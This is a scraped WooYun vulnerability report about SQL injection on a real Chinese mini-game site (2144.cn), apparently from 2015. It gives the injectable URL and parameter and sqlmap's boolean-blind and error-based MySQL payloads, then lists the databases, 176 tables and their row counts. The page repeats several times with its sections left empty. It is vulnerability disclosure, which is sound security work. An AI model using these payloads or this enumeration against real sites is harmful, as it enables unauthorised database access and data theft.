2144游戏存在SQL注入 | wooyun-2015-0141337| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141337

漏洞标题：2144游戏存在SQL注入

漏洞作者： me1ody

提交时间：2015-09-15 18:45

修复时间：2015-10-31 14:04

公开时间：2015-10-31 14:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-15：细节已通知厂商并且等待厂商处理中
2015-09-16：厂商已经确认，细节仅向厂商公开
2015-09-26：细节向核心白帽子及相关领域专家公开
2015-10-06：细节向普通白帽子公开
2015-10-16：细节向实习白帽子公开
2015-10-31：细节向公众公开

简要描述：

2144游戏网（2144.cn）创建于2006年，是目前国内最受欢迎的小游戏网站。八年来，我们一直秉承着服务用户、快乐至上的发展理念，致力提供最丰富、最优先的游戏内容。发展至今，2144游戏网已经成为一个涵盖小游戏、网页游戏、手机游戏、游戏资讯等多个领域的综合性休闲游戏平台。目前，2144游戏网已经拥有近1亿的注册用户，每天都有超过500万玩家一起在2144玩游戏，并且这些数据，每天都在以令人惊喜的速度不断刷新。

详细说明：

注入点

http://act.2144.cn/week/?id=6

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 6403=6403
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [3]:
[*] act_2144_cn
[*] information_schema
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 6403=6403
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
Database: act_2144_cn
[176 tables]
+-------------------------+
| act_admin               |
| act_code                |
| act_diy_same            |
| act_diy_user            |
| act_editor              |
| act_element             |
| act_info                |
| act_photo               |
| act_tp                  |
| act_user                |
| act_vote                |
| act_week                |
| act_week_category       |
| act_week_element        |
| android_app_bh_libao    |
| aoqi_bind               |
| aoqi_chance             |
| aoqi_invite             |
| aoqi_log                |
| aoqi_reward             |
| aoqi_signin             |
| aoqi_user               |
| aoyun_ip                |
| aoyun_vote              |
| baba2_ip                |
| baba2_vote              |
| bbjq_ip                 |
| bbjq_vote               |
| bbjx_ip                 |
| bbjx_vote               |
| bkhy_code               |
| bkhy_ip                 |
| common_libao            |
| core_category           |
| core_message            |
| core_support            |
| core_xmas_code          |
| core_xmas_exchange      |
| core_xmas_user          |
| csbh_gift               |
| csbh_gift_1             |
| csbh_gift_3             |
| csbh_user               |
| csbh_user_1             |
| csbh_user_3             |
| csbhsjb_ip              |
| csbhsjb_vote            |
| csbhsqdzz               |
| cwzw_libao              |
| cyhx_ip                 |
| cyhx_vote               |
| dkdb2_code              |
| dkdb2_ip                |
| dkdb_code               |
| dkdb_ip                 |
| dlzs                    |
| dlzs_ip                 |
| dlzs_name               |
| duanwu_2014_hao123_ip   |
| duanwu_2014_hao123_vote |
| duanwu_2014_ip          |
| duanwu_2014_vote        |
| duanwu_ip               |
| duanwu_vote             |
| dyyx_ip                 |
| dyyx_vote               |
| fnxn_ip                 |
| fnxn_vote               |
| game_score              |
| game_score_month        |
| gfp_answerlog           |
| gfp_vote                |
| gq2011                  |
| gzbs_ip                 |
| gzbs_vote               |
| haqi_invite             |
| haqi_user               |
| hdl_md_list             |
| hdl_users               |
| hhz_ip                  |
| hhz_vote                |
| jjxf                    |
| jlw2014_bind            |
| jlw2014_chance          |
| jlw2014_reward          |
| jlw2014_signin          |
| jlw_log                 |
| jlw_user                |
| kaixue_ip               |
| kaixue_vote             |
| kjys_ip                 |
| kjys_vote               |
| kkml3                   |
| kkml3_ip                |
| klns_ip                 |
| klns_vote               |
| kxbb_ip                 |
| kxbb_vote               |
| liudi                   |
| liudi_user              |
| lol_act_ip              |
| lol_act_vote            |
| mole                    |
| mole_mimi               |
| mqmm_ip                 |
| mqmm_vote               |
| music                   |
| music2                  |
| music_bak               |
| mxh1                    |
| mxh1_ip                 |
| mxh2                    |
| mxh2_ip                 |
| mxh3                    |
| mxh3_ip                 |
| mxh4                    |
| mxh4_ip                 |
| mxh5                    |
| mxh5_ip                 |
| mxxgs_code              |
| mzfs_ip                 |
| mzfs_vote               |
| newyear2012             |
| newyear2012_stat        |
| newyear2012_visit       |
| qx2015                  |
| qx2015_userinfo         |
| rexue_bind_2014         |
| rexue_reward_2014       |
| scheme_info             |
| scheme_user             |
| seer2012_ip             |
| seer2012_signin         |
| seer2012_vote           |
| seer2013_gifts          |
| seer2013_logs           |
| seer2013_userinfo       |
| seer2013_vote           |
| seer2014_gifts          |
| seer2014_logs           |
| seer2014_mibi_dy        |
| seer2014_userinfo       |
| seer51                  |
| seer51_ip               |
| seer51_num              |
| sexz_ip                 |
| sexz_vote               |
| shaun_ip                |
| shaun_vote              |
| t_admin                 |
| t_operate               |
| tfboy_ip                |
| tfboy_vote              |
| tuijian_sum             |
| tuijian_user            |
| uchome_act_kjys         |
| web_bofangye            |
| web_survey              |
| worldcpu_2014_ip        |
| worldcpu_2014_vote      |
| wxgq_code               |
| xiaozhi_ip              |
| xiaozhi_vote            |
| xw                      |
| xyj_ip                  |
| xyj_vote                |
| zombie_ip               |
| zombie_vote             |
| zp_exchange_code        |
| zp_gift_info            |
| zp_gift_list            |
| zp_lottery_info         |
| zslm_code               |
| zslm_survey             |
| zuinan_ip               |
| zuinan_vote             |
+-------------------------+
Database: act_2144_cn
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| tfboy_ip                | 6043089 |
| kjys_ip                 | 3588788 |
| bbjx_ip                 | 2553712 |
| kxbb_ip                 | 1796136 |
| baba2_ip                | 1601660 |
| fnxn_ip                 | 1338184 |
| bbjq_ip                 | 957779  |
| gzbs_ip                 | 555666  |
| xyj_ip                  | 520118  |
| act_code                | 270000  |
| csbh_gift               | 200000  |
| cyhx_ip                 | 190424  |
| shaun_ip                | 183099  |
| sexz_ip                 | 177876  |
| zombie_ip               | 175523  |
| mzfs_ip                 | 174881  |
| dlzs                    | 145000  |
| klns_ip                 | 120392  |
| dlzs_name               | 113933  |
| dlzs_ip                 | 110966  |
| mole                    | 100000  |
| game_score              | 80224   |
| game_score_month        | 77080   |
| hhz_ip                  | 72434   |
| zuinan_ip               | 71143   |
| mqmm_ip                 | 56791   |
| act_user                | 54553   |
| mxh1_ip                 | 49414   |
| common_libao            | 44993   |
| mole_mimi               | 41235   |
| jlw2014_reward          | 40200   |
| csbh_gift_3             | 40000   |
| mxh3_ip                 | 38875   |
| newyear2012_visit       | 35247   |
| csbh_gift_1             | 31013   |
| aoqi_reward             | 30328   |
| seer2014_gifts          | 30200   |
| dkdb2_code              | 30000   |
| seer2014_logs           | 29156   |
| seer2012_signin         | 28560   |
| mxh2_ip                 | 21259   |
| rexue_reward_2014       | 20510   |
| seer2013_gifts          | 20090   |
| bkhy_code               | 20000   |
| android_app_bh_libao    | 19998   |
| liudi                   | 18000   |
| dyyx_ip                 | 17611   |
| mxh4_ip                 | 17608   |
| dkdb_ip                 | 17446   |
| newyear2012             | 16294   |
| duanwu_2014_ip          | 16140   |
| duanwu_ip               | 14100   |
| jjxf                    | 14000   |
| worldcpu_2014_ip        | 13112   |
| csbh_user_1             | 12748   |
| dkdb2_ip                | 12499   |
| seer51                  | 12182   |
| mxh5_ip                 | 12022   |
| seer2014_userinfo       | 11103   |
| dkdb_code               | 10350   |
| mxxgs_code              | 10000   |
| uchome_act_kjys         | 10000   |
| core_message            | 8895    |
| zslm_survey             | 8819    |
| csbh_user_3             | 8674    |
| t_operate               | 6973    |
| zp_exchange_code        | 6318    |
| jlw2014_signin          | 6044    |
| csbh_user               | 5808    |
| seer51_ip               | 5727    |
| kkml3_ip                | 5652    |
| kaixue_ip               | 5322    |
| aoqi_signin             | 5033    |
| csbhsqdzz               | 4999    |
| seer2012_ip             | 4227    |
| web_survey              | 4175    |
| aoqi_log                | 4095    |
| newyear2012_stat        | 3918    |
| aoqi_chance             | 3452    |
| jlw2014_chance          | 3352    |
| jlw_log                 | 3344    |
| core_xmas_code          | 3306    |
| jlw2014_bind            | 3269    |
| aoqi_bind               | 3172    |
| gfp_answerlog           | 3152    |
| act_diy_user            | 3027    |
| aoyun_ip                | 2371    |
| kkml3                   | 2232    |
| xiaozhi_ip              | 2177    |
| seer2013_userinfo       | 2118    |
| act_week_element        | 2048    |
| cwzw_libao              | 1500    |
| seer2013_logs           | 1485    |
| bkhy_ip                 | 1394    |
| haqi_user               | 1390    |
| core_xmas_user          | 1260    |
| rexue_bind_2014         | 990     |
| wxgq_code               | 942     |
| jlw_user                | 844     |
| csbhsjb_ip              | 834     |
| zslm_code               | 600     |
| qx2015                  | 542     |
| act_editor              | 495     |
| lol_act_ip              | 451     |
| liudi_user              | 405     |
| act_week_category       | 346     |
| act_photo               | 330     |
| act_diy_same            | 303     |
| scheme_info             | 266     |
| tuijian_user            | 187     |
| hdl_md_list             | 105     |
| act_element             | 100     |
| aoqi_invite             | 99      |
| haqi_invite             | 72      |
| web_bofangye            | 70      |
| music                   | 68      |
| music2                  | 68      |
| music_bak               | 59      |
| core_support            | 53      |
| xw                      | 50      |
| worldcpu_2014_vote      | 32      |
| act_week                | 31      |
| seer2014_mibi_dy        | 27      |
| core_xmas_exchange      | 23      |
| mxh3                    | 17      |
| bbjx_vote               | 16      |
| dyyx_vote               | 16      |
| hhz_vote                | 16      |
| kjys_vote               | 16      |
| mqmm_vote               | 16      |
| mxh2                    | 16      |
| mzfs_vote               | 16      |
| seer2012_vote           | 16      |
| zuinan_vote             | 16      |
| qx2015_userinfo         | 15      |
| mxh1                    | 14      |
| xyj_vote                | 14      |
| mxh4                    | 13      |
| mxh5                    | 13      |
| t_admin                 | 13      |
| tuijian_sum             | 13      |
| act_vote                | 12      |
| scheme_user             | 12      |
| sexz_vote               | 12      |
| tfboy_vote              | 12      |
| act_tp                  | 10      |
| kxbb_vote               | 10      |
| act_info                | 9       |
| bbjq_vote               | 8       |
| csbhsjb_vote            | 8       |
| gq2011                  | 8       |
| shaun_vote              | 8       |
| zp_gift_info            | 8       |
| act_admin               | 7       |
| kaixue_vote             | 7       |
| aoyun_vote              | 6       |
| gzbs_vote               | 6       |
| baba2_vote              | 5       |
| duanwu_vote             | 5       |
| klns_vote               | 5       |
| xiaozhi_vote            | 5       |
| duanwu_2014_hao123_ip   | 4       |
| lol_act_vote            | 4       |
| duanwu_2014_hao123_vote | 3       |
| zp_lottery_info         | 3       |
| cyhx_vote               | 2       |
| duanwu_2014_vote        | 2       |
| fnxn_vote               | 2       |
| gfp_vote                | 2       |
| seer2013_vote           | 2       |
| seer51_num              | 2       |
| zombie_vote             | 2       |
+-------------------------+---------+

漏洞证明：

如上

修复方案：

- -

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-09-16 14:02

厂商回复：

感谢您对2144安全工作的支持

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141337

漏洞标题：2144游戏存在SQL注入

相关厂商：2144.cn

漏洞作者： me1ody

提交时间：2015-09-15 18:45

修复时间：2015-10-31 14:04

公开时间：2015-10-31 14:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141337

漏洞标题：2144游戏存在SQL注入

相关厂商：2144.cn

漏洞作者： me1ody

提交时间：2015-09-15 18:45

修复时间：2015-10-31 14:04

公开时间：2015-10-31 14:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：11

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141337"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 me1ody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：